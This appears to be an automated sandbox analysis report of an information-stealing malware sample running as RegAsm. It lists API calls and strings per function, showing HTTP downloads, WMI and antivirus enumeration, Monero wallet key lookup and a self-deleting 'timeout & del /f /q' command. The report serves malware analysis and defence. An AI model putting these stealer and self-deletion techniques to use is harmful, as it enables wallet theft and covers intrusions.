                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408841
                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089AE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 004089B5
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408AD8
                                                                                • lstrcat.KERNEL32(00000000,00425DDC), ref: 00408AE6
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408AF8
                                                                                • lstrcat.KERNEL32(00000000,00425DE0), ref: 00408B06
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00408C19
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00408C27
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • memset.MSVCRT ref: 00408C7F
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00408CA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                • String ID:
                                                                                • API String ID: 156379684-0
                                                                                • Opcode ID: 8ee0452d1c9f8879db682c44a8bd06a3f2f501328dfa6872344a5bf684e5f478
                                                                                • Instruction ID: 517fb1482c7bf48e2daa8cc91bc62da6b68edd990b633fa38b7ec1900e684afa
                                                                                • Opcode Fuzzy Hash: 8ee0452d1c9f8879db682c44a8bd06a3f2f501328dfa6872344a5bf684e5f478
                                                                                • Instruction Fuzzy Hash: 11F15771804158EADB15EBE4DD1ABEEBB74AF18308F50407EE405B21E2DF782A09DB25
                                                                                Function 0041077C Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 155memorycomtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00410781
                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                • CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                • VariantInit.OLEAUT32(?), ref: 00410855
                                                                                  • Part of subcall function 004106C4: _EH_prolog.MSVCRT ref: 004106C9
                                                                                  • Part of subcall function 004106C4: CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                  • Part of subcall function 004106C4: SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                  • Part of subcall function 004106C4: _wtoi64.MSVCRT ref: 00410738
                                                                                  • Part of subcall function 004106C4: SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                  • Part of subcall function 004106C4: SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 0041088D
                                                                                • GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 00410893
                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory), ref: 004108A0
                                                                                • VariantClear.OLEAUT32(?), ref: 004108E2
                                                                                • wsprintfA.USER32 ref: 004108CC
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                • API String ID: 2456697202-461178377
                                                                                • Opcode ID: 6bbc65757a9dd392a9b543c355a983862ea0ffb6972efa9a5f29065882e5d019
                                                                                • Instruction ID: 9d86073096b1dc3cc792ac086ea264928f3f197bf5d8e0195c0b1cef05d7c5cd
                                                                                • Opcode Fuzzy Hash: 6bbc65757a9dd392a9b543c355a983862ea0ffb6972efa9a5f29065882e5d019
                                                                                • Instruction Fuzzy Hash: 8D514B71A01228BFCB20DB95DC49EEFBB7CEF49B10F504116F515E6190D7B85A41CBA8
                                                                                Function 004118AE Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004118B3
                                                                                • strtok_s.MSVCRT ref: 004118E4
                                                                                • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041197C
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                • lstrcpy.KERNEL32(?,?), ref: 00411A33
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00411A6F
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00411AB6
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00411AFD
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00411B44
                                                                                • strtok_s.MSVCRT ref: 00411CA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                • String ID: false$true
                                                                                • API String ID: 49562497-2658103896
                                                                                • Opcode ID: 42b556ca287b3747ecbd8e606c3f76c76cceba898297701c297a24441a87d915
                                                                                • Instruction ID: db91816e4951f7301f92f20e3279e8c92673a629158fb1b6361f6b740d505876
                                                                                • Opcode Fuzzy Hash: 42b556ca287b3747ecbd8e606c3f76c76cceba898297701c297a24441a87d915
                                                                                • Instruction Fuzzy Hash: A1C182B190021DAFDF10EFE4D855EDE77B9AF18304F10446AF505A3191DF78AA89CB64
                                                                                Function 00404F2A Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00404F2F
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004050DD
                                                                                • InternetCloseHandle.WININET(?), ref: 004050E6
                                                                                • InternetCloseHandle.WININET(?), ref: 004050EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                • String ID: ERROR$ERROR$GET
                                                                                • API String ID: 2435781452-2509457195
                                                                                • Opcode ID: 899a52d47c7290b0c62d563f9c6a8f5db657679a145607c8c84c3a78f8ada9c9
                                                                                • Instruction ID: 4f8882304835992de02ce188a42af96545f0e5a020f056082c0570d921596d9d
                                                                                • Opcode Fuzzy Hash: 899a52d47c7290b0c62d563f9c6a8f5db657679a145607c8c84c3a78f8ada9c9
                                                                                • Instruction Fuzzy Hash: BF513F71900119AFEB11EBE0DC85FEEBBB9EB09744F10403AF605B2191DB795E488BA5
                                                                                Function 004041B2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170networkmemoryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004041B7
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                                • InternetCloseHandle.WININET(?), ref: 00404372
                                                                                • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                • String ID: GET
                                                                                • API String ID: 1687531150-1805413626
                                                                                • Opcode ID: 0a3a0618bbe36edcb62e868f1fafd794c33d3d2d9b336a3c2704ce5094abb541
                                                                                • Instruction ID: 70797dbb62b7227b97fb4dad1cf9611d4221403ee57f1c0e2ca818baf810037a
                                                                                • Opcode Fuzzy Hash: 0a3a0618bbe36edcb62e868f1fafd794c33d3d2d9b336a3c2704ce5094abb541
                                                                                • Instruction Fuzzy Hash: DB516EB2900219AFDF10EFE0DC85AEEBBB9EB49344F00513AFA01B2190D7785E45CB65
                                                                                Function 004136E3 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004136E8
                                                                                • memset.MSVCRT ref: 00413708
                                                                                • memset.MSVCRT ref: 00413714
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00413729
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004138B5
                                                                                • memset.MSVCRT ref: 004138C2
                                                                                • memset.MSVCRT ref: 004138D0
                                                                                • ExitProcess.KERNEL32 ref: 004138E1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                • API String ID: 1312519015-206210831
                                                                                • Opcode ID: 55572b1a904cb1af1763ca9e7bd8291c3d34ccd4c407e7393e9b41159a59be07
                                                                                • Instruction ID: 7cc86f5a3bc31e5bf112f7f201b24b9592421ec460c7ef1d8f903e98a033c0e4
                                                                                • Opcode Fuzzy Hash: 55572b1a904cb1af1763ca9e7bd8291c3d34ccd4c407e7393e9b41159a59be07
                                                                                • Instruction Fuzzy Hash: EF512DB1D0024DEEDB11EBE1C992ADEBBB8AF18304F50017EE505B3582DB785B48CB65
                                                                                Function 00410925 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 125comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041092A
                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                • CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                • VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                  • Part of subcall function 00410C8D: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1D,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000), ref: 00410C95
                                                                                  • Part of subcall function 00410C8D: CharToOemW.USER32(?,00000000), ref: 00410CA1
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • VariantClear.OLEAUT32(?), ref: 00410A2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                • API String ID: 3694693100-315474579
                                                                                • Opcode ID: 69e3ebb3ae139267ec9dcccb77a6a5073b61d7bf20a9a102ba59cc22b6a9a18b
                                                                                • Instruction ID: eaee24b4b2737a5a762c4e74348500a03556ab89a27190f447ac073c3fdbdc8f
                                                                                • Opcode Fuzzy Hash: 69e3ebb3ae139267ec9dcccb77a6a5073b61d7bf20a9a102ba59cc22b6a9a18b
                                                                                • Instruction Fuzzy Hash: 5A418E70A01229BFCB20DB95DD49EEF7F79EF49B60F60411AF115A6180C7B85A41CBE8
                                                                                Function 00401C6B Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 179stringfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00401C70
                                                                                • memset.MSVCRT ref: 00401C8E
                                                                                  • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                  • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                  • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                  • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
